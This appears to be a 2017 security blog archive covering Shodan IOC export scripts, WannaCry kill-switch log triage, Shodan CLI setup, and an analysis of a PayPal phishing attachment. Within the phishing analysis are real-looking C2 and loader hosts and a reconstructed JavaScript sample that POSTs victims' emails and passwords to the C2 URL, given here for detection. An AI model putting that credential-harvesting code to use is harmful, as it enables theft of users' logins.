Tuesday, May 30, 2017

Python: converting Shodan CSV into IOCs CSV

This is a small script that converts the CSV downloaded from Shodan into a new CSV that is usable for ingesting into other platforms (e.g. ThreatConnect). You can grab the IOC column (e.g. the IPs) and create a new CSV file with just that column; this new CSV can then be ingested into any other platform. You can pick and choose which column(s) you want to carry over into the new CSV, with minor tweaks to the script. Before importing, check the first few rows of the output: an IOC feed that carries a stray header, a blank row or a non-IP value will usually fail validation on the receiving platform. I'll keep updating this script and make it as interactive as possible, so watch the GitHub repo!
Get it here.
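As an added example of the conversion described above (this is not the script from the post or the repo), the following Python projects a Shodan CSV export onto the columns you want to carry over, drops rows whose IP column does not parse, and de-duplicates the result. The column names (`ip_str`, `port`, `hostnames`, `timestamp`, `data`) and the sample rows are assumed; check the header row of your own export and adjust `keep` accordingly.

```python
# Added example, not the post's script: project selected columns of a Shodan CSV
# export into a smaller IOC CSV, validating and de-duplicating the IP indicators
# so the output can be bulk-imported into a threat-intel platform.
import csv
import io
import ipaddress

# Constructed sample standing in for a Shodan CSV download. The column names are
# an assumption; real exports may differ, so check the header row first.
SAMPLE_SHODAN_CSV = """ip_str,port,hostnames,timestamp,data
198.51.100.7,8080,"c2.example.test","2017-05-29T10:00:00","HTTP/1.1 200 OK"
198.51.100.7,443,"c2.example.test","2017-05-29T10:01:00","TLS"
203.0.113.9,4444,"","2017-05-30T01:23:45","banner"
not-an-ip,80,"","2017-05-30T02:00:00","junk row"
"""


def extract_iocs(csv_text, keep=("ip_str",), ip_column="ip_str"):
    """Return the rows of csv_text projected onto the `keep` columns.

    Rows whose IP column does not parse as an IPv4/IPv6 address are dropped,
    and duplicate projected rows are removed, keeping first-seen order.
    """
    reader = csv.DictReader(io.StringIO(csv_text))
    header = reader.fieldnames or []
    missing = [c for c in list(keep) + [ip_column] if c not in header]
    if missing:
        raise ValueError("columns not in export header: %s" % ", ".join(missing))
    seen = set()
    rows = []
    for row in reader:
        try:
            ipaddress.ip_address(row[ip_column].strip())
        except ValueError:
            continue  # no usable IP indicator on this row
        projected = tuple(row[c].strip() for c in keep)
        if projected in seen:
            continue
        seen.add(projected)
        rows.append(projected)
    return rows


def to_ioc_csv(rows, keep=("ip_str",)):
    """Serialise projected rows as CSV text with a header row."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(keep)
    writer.writerows(rows)
    return out.getvalue()


def convert_file(src_path, dst_path, keep=("ip_str",)):
    """File-to-file wrapper: read a Shodan CSV, write the IOC CSV, return row count."""
    with open(src_path, newline="", encoding="utf-8") as f:
        rows = extract_iocs(f.read(), keep)
    with open(dst_path, "w", newline="", encoding="utf-8") as f:
        f.write(to_ioc_csv(rows, keep))
    return len(rows)


if __name__ == "__main__":
    cols = ("ip_str", "port")
    print(to_ioc_csv(extract_iocs(SAMPLE_SHODAN_CSV, cols), cols), end="")
```

Keeping only `ip_str` collapses the two banners for 198.51.100.7 into one indicator; carrying `port` as well keeps them apart, which is what you want if the downstream platform models IP:port pairs.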


Tuesday, May 23, 2017

Sunday, May 14, 2017

Malware: WannaCry RansomWare - Infection Vector unlikely to be Phishing

By now, the whole world has heard of the new ransomware WannaCry and its variants. Some of you might be wondering why there hasn't been anything posted here on this site regarding the phishing aspect of the campaign. The reason is quite simple. Unlike what many security vendors have reported, it is highly unlikely that the infection is being spread through phishing campaigns. The malware is targeting victims across the world by exploiting the well-known SMBv1 vulnerability (patched in MS17-010) using the EternalBlue exploit that the Shadow Brokers leaked very recently. It looks like the internet is being scanned for computers with port 445 exposed, which are then attacked directly with the malware, so there is no lure or attachment for a user to click.

Easy wins: apply MS17-010, disable SMBv1 (and block TCP 445 at the perimeter), and make sure your web filter or proxy is not blocking the kill-switch domain, because the payload only stops if its HTTP request to that domain succeeds.

There is a lot of reporting around this now, but most of it is just re-tweets and news stories that add little to nothing to the understanding of the real campaign.

Here's a good RE paper from Jake Williams on the payload.
And here's the tool that you can use to prevent WannaCry infections if you can't patch your systems.
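The kill-switch point above is easy to verify from egress logs. As an added example (not part of the original post), the following Python triages web-proxy log lines for requests to the kill-switch domain found in the initial WannaCry sample: any request at all means the dropper ran on that client, and a request the filter blocked means the client never got the "stop" answer and the worm payload carried on. The log layout (`<timestamp> <client_ip> <ALLOW|BLOCK> <url>`) and the sample lines are constructed for the example.

```python
# Added example, not from the original post: find hosts that reached (or were
# blocked from reaching) the WannaCry kill-switch domain in a web-proxy log.
import re
from collections import defaultdict

# Kill-switch domain hard-coded in the first widely analysed WannaCry sample.
KILL_SWITCH_DOMAINS = {"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"}

# Assumed log layout for this example: "<timestamp> <client_ip> <ALLOW|BLOCK> <url>"
LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(ALLOW|BLOCK)\s+(\S+)\s*$")

# Constructed sample lines (not real log data).
SAMPLE_LOG = [
    "2017-05-12T11:02:03Z 10.0.0.5 BLOCK http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/",
    "2017-05-12T11:02:04Z 10.0.0.6 ALLOW http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/",
    "2017-05-12T11:02:05Z 10.0.0.7 ALLOW http://www.paypal.com/",
    "this line is not in the expected format",
]


def host_of(url):
    """Extract the host part of a URL and normalise it (lower-case, no leading www.)."""
    m = re.match(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:?#]+)", url, re.IGNORECASE)
    if not m:
        return ""
    host = m.group(1).lower()
    return host[4:] if host.startswith("www.") else host


def triage(lines, domains=KILL_SWITCH_DOMAINS):
    """Return {client_ip: {"contacted": n, "blocked": n}} for kill-switch requests."""
    hits = defaultdict(lambda: {"contacted": 0, "blocked": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; skipped rather than guessed at
        _ts, client, action, url = m.groups()
        if host_of(url) not in domains:
            continue
        hits[client]["contacted"] += 1
        if action == "BLOCK":
            hits[client]["blocked"] += 1
    return dict(hits)


def hosts_that_ran_dropper(lines, domains=KILL_SWITCH_DOMAINS):
    """Every client that asked for the domain executed the dropper."""
    return sorted(triage(lines, domains))


def hosts_needing_isolation(lines, domains=KILL_SWITCH_DOMAINS):
    """Clients whose kill-switch request was blocked: the payload continued there."""
    return sorted(ip for ip, h in triage(lines, domains).items() if h["blocked"])


if __name__ == "__main__":
    print("ran dropper:", hosts_that_ran_dropper(SAMPLE_LOG))
    print("isolate now:", hosts_needing_isolation(SAMPLE_LOG))
```

One caveat when reading the results: the sample makes a direct HTTP request without honouring system proxy settings, so in a proxy-only environment the request never reaches the proxy log at all and fails in the same way a block would. Absence of a kill-switch hit is therefore not evidence that a host is clean.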


Wednesday, May 10, 2017

Tuesday, May 9, 2017

Phishing: PayPal theme 10 May 2017 | CredSteal

Originally published in PhishCentral

This one is currently active. It tries to lure victims into downloading and opening an HTML file that opens locally in the browser but POSTs the entered information back to the C2 when the 'Submit' button is hit, provided the information matches the conditions in the script.
This is what the email body looks like.

The HTML Attachment

Clever, obfuscated JS in the background makes the connection.
The actual HTML content only loads if internet access is available: the JS fetches the page contents from a remote host and then writes them into the browser, so opening the attachment in an offline sandbox shows you nothing.

Locally saved HTML, loaded into a browser with internet available

The actual content is served from this server:  www.infosec1.net

PCAP of the request in the background

The content served

The whole HTML is delivered in encoded (obfuscated) form and is only decoded on the fly in the browser. Once decoded, we can see the JS code that executes in the browser.

Decrypted Code

The JS code is clever and checks for a few conditions on the entered data. If the conditions are met, it POSTs the info to the C2, http://www.bootstrapcdn3.net/e0445952.php; if they are not met, it redirects to the legitimate PayPal site, so a victim who mistypes simply lands on the real login page and sees nothing suspicious.

One of the conditions. 

Final condition that directs the traffic

IOCs for this (from the analysis above):

Loader host serving the page content: www.infosec1.net
C2 receiving the POSTed credentials: http://www.bootstrapcdn3.net/e0445952.php
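Because the attachment is a two-stage loader (an obfuscated stub that pulls the real form from a remote host, which then POSTs off-brand), a quick static triage of the HTML catches the pattern before detonation. The following Python is an added example and not part of the original analysis: it pulls every URL out of an HTML attachment, separates hosts that belong to the impersonated brand from those that do not, and looks for the loader and credential-form signals described above. The two sample attachments are constructed to mirror the post's description (readable rather than obfuscated, and using the hosts named on this page); the signal regexes are heuristics, not a signature.

```python
# Added example, not from the original post: static triage of an HTML attachment
# for (a) remote-loader behaviour and (b) credential forms that leave the brand.
import re
from urllib.parse import urlparse

BRAND_DOMAINS = {"paypal.com"}  # the brand the lure impersonates

# Constructed stage 1: the attachment as delivered (the real one is obfuscated).
SAMPLE_ATTACHMENT = """<html><body>
<script>
var x = new XMLHttpRequest();
x.open('GET', 'http://www.infosec1.net/loader', true);
x.onload = function () { document.write(unescape(x.responseText)); };
x.send();
</script>
</body></html>"""

# Constructed stage 2: what the loader writes into the page once online.
SAMPLE_STAGE2 = """<form id="login">
<input name="login_email"><input name="login_password" type="password">
<button onclick="go()">Submit</button></form>
<script>
function go() {
  var e = document.forms[0].login_email.value, p = document.forms[0].login_password.value;
  if (e.indexOf('@') > 0 && p.length >= 6) {
    var r = new XMLHttpRequest();
    r.open('POST', 'http://www.bootstrapcdn3.net/e0445952.php', true);
    r.send('email=' + e + '&pass=' + p);
  } else {
    window.location = 'https://www.paypal.com/';
  }
}
</script>"""

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)
REMOTE_LOAD_RE = re.compile(r"XMLHttpRequest|fetch\s*\(|<script[^>]+src\s*=", re.IGNORECASE)
DYNAMIC_EVAL_RE = re.compile(r"\b(eval|document\.write|unescape|atob|Function)\s*\(", re.IGNORECASE)
PASSWORD_FIELD_RE = re.compile(r"""type\s*=\s*['"]?password""", re.IGNORECASE)


def same_org(host, brand_domains=BRAND_DOMAINS):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def external_hosts(html):
    """All hosts referenced by absolute http(s) URLs in the document, sorted."""
    hosts = set()
    for url in URL_RE.findall(html):
        h = urlparse(url).hostname
        if h:
            hosts.add(h.lower())
    return sorted(hosts)


def triage_attachment(html, brand_domains=BRAND_DOMAINS):
    hosts = external_hosts(html)
    off_brand = [h for h in hosts if not same_org(h, brand_domains)]
    remote_load = bool(REMOTE_LOAD_RE.search(html))
    dynamic_eval = bool(DYNAMIC_EVAL_RE.search(html))
    password_field = bool(PASSWORD_FIELD_RE.search(html))
    if password_field and off_brand:
        verdict = "credential-harvester"  # login form, data leaves the brand
    elif remote_load and dynamic_eval and off_brand:
        verdict = "remote-loader"  # stub that fetches and writes remote content
    elif off_brand:
        verdict = "off-brand-references"
    else:
        verdict = "no-off-brand-references"
    return {
        "hosts": hosts,
        "off_brand_hosts": off_brand,
        "remote_load": remote_load,
        "dynamic_eval": dynamic_eval,
        "password_field": password_field,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for name, doc in (("stage1", SAMPLE_ATTACHMENT), ("stage2", SAMPLE_STAGE2)):
        print(name, triage_attachment(doc))
```

Stage 1 on its own contains no form and no brand reference at all, which is exactly why a mail gateway that only looks for "paypal" plus a password field misses it; the off-brand remote load plus `document.write(unescape(...))` is the signal to act on. Stage 2 is only visible once the stub has been allowed to fetch it.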

Using Shodan CLI | Downloading malware IOCs

I started using the Shodan CLI for personal research into malware C2 hosts and found Shodan's new Malware Hunter crawler results to be very helpful.
Thought I'd share with you how I use the CLI to grab the IOCs and then convert the JSON report into a CSV, which can then be used in many ways.

All of this is happening AFTER Shodan API keys have been successfully initialised (described in a post earlier).

First up, simply fire up the Shodan CLI to download the indicators by running the command below (note that `download` consumes query credits in proportion to the limit you set):

$ shodan download --limit <number of results you want, e.g. 1000> <filename, e.g. malware-iocs-date> category:malware

For example:

$ shodan download --limit 1000 malware category:malware

This dumps the results for you into a gzipped, newline-delimited JSON file named after the filename you gave, here malware.json.gz.
Next, if you want to, convert the results into a CSV:

$ shodan convert malware.json.gz csv

That's it. It'll write a CSV version of the file (malware.csv) for you to use whatever way you want to.
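If you want more control than `shodan convert` gives you (for instance only a few banner fields, or a list field such as hostnames joined into one cell), you can read the download directly. The following Python is an added example, not part of the post or of the Shodan CLI: it walks the gzipped newline-delimited JSON that `shodan download` writes, flattens the banner fields you choose into CSV rows, and can write a file ready for import. The field names used (`ip_str`, `port`, `transport`, `hostnames`, `timestamp`, `org`) are standard Shodan banner keys; the two sample banners are constructed for the example.

```python
# Added example, not from the post or the Shodan CLI: flatten a shodan download
# (gzipped, one JSON banner per line) into CSV rows of chosen fields.
import csv
import gzip
import io
import json

FIELDS = ("ip_str", "port", "transport", "hostnames", "timestamp", "org")

# Constructed sample banners (not real Shodan data), shaped like the real ones.
SAMPLE_BANNERS = [
    {"ip_str": "198.51.100.7", "port": 8080, "transport": "tcp",
     "hostnames": ["c2.example.test", "alt.example.test"],
     "timestamp": "2017-05-09T10:00:00.000000", "org": "Example Hosting",
     "data": "HTTP/1.1 200 OK\r\n"},
    {"ip_str": "203.0.113.9", "port": 4444, "transport": "tcp",
     "hostnames": [], "timestamp": "2017-05-09T10:05:00.000000", "org": None,
     "data": "banner"},
]
SAMPLE_JSONL = "".join(json.dumps(b) + "\n" for b in SAMPLE_BANNERS)


def iter_banners(stream):
    """Yield one banner dict per non-empty line of a newline-delimited JSON stream."""
    for line in stream:
        line = line.strip()
        if line:
            yield json.loads(line)


def iter_banners_gz(path):
    """Open a shodan download (.json.gz) and yield its banners."""
    with gzip.open(path, "rt", encoding="utf-8") as f:
        yield from iter_banners(f)


def flatten(banner, fields=FIELDS):
    """Turn a banner into a list of strings; list fields are joined with ';'."""
    row = []
    for name in fields:
        value = banner.get(name)
        if isinstance(value, list):
            value = ";".join(str(v) for v in value)
        row.append("" if value is None else str(value))
    return row


def banners_to_csv(banners, fields=FIELDS):
    """Serialise banners as CSV text with a header row."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(fields)
    for banner in banners:
        writer.writerow(flatten(banner, fields))
    return out.getvalue()


def convert_download(gz_path, csv_path, fields=FIELDS):
    """Read a shodan download and write the chosen fields to csv_path; return row count."""
    rows = [flatten(b, fields) for b in iter_banners_gz(gz_path)]
    with open(csv_path, "w", newline="", encoding="utf-8") as f:
        writer = csv.writer(f, lineterminator="\n")
        writer.writerow(fields)
        writer.writerows(rows)
    return len(rows)


if __name__ == "__main__":
    print(banners_to_csv(iter_banners(io.StringIO(SAMPLE_JSONL))), end="")
```

Streaming the file line by line matters here: a large download can be hundreds of megabytes uncompressed, and the `data` field (the raw banner) is the bulk of it, so only decode what you need.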


Thursday, May 4, 2017

Installing the Shodan CLI

I've released a python tool that downloads, installs and initiates Shodan CLI - you can get it on github. More details in this post: http://rakshatec.blogspot.com.au/2017/05/free-tool-for-installing-shodan-cli.html

Here's a step-by-step guide for installing the Shodan CLI, very useful if you want to download data using commands instead of the browser. I looked around the internet for something like this but couldn't find anything, so thought I'd chuck this one on here.

You need Python installed to get started.
Once you have Python installed and ready to go, follow these steps. Depending on what you have and haven't got installed already, some steps might not be required.

First of all install pip (on current distributions the package is python3-pip and the command is pip3; python-pip below is the Python 2 package that was current when this was written):

$ sudo apt install python-pip

Once pip is installed, go for Shodan!

$ pip install shodan

Good to go:

Now it's time to initialize your API key, which you can get from your shodan.io account.
Use this command to initialize the key:

$ shodan init YOUR_API_KEY

Keep in mind that the key passed on the command line ends up in your shell history, so treat that history (and the key file shodan init writes under your home directory) as a secret, and rotate the key from your account page if it leaks.

You should be good to go from here on.
For more commands, have a look here: https://cli.shodan.io/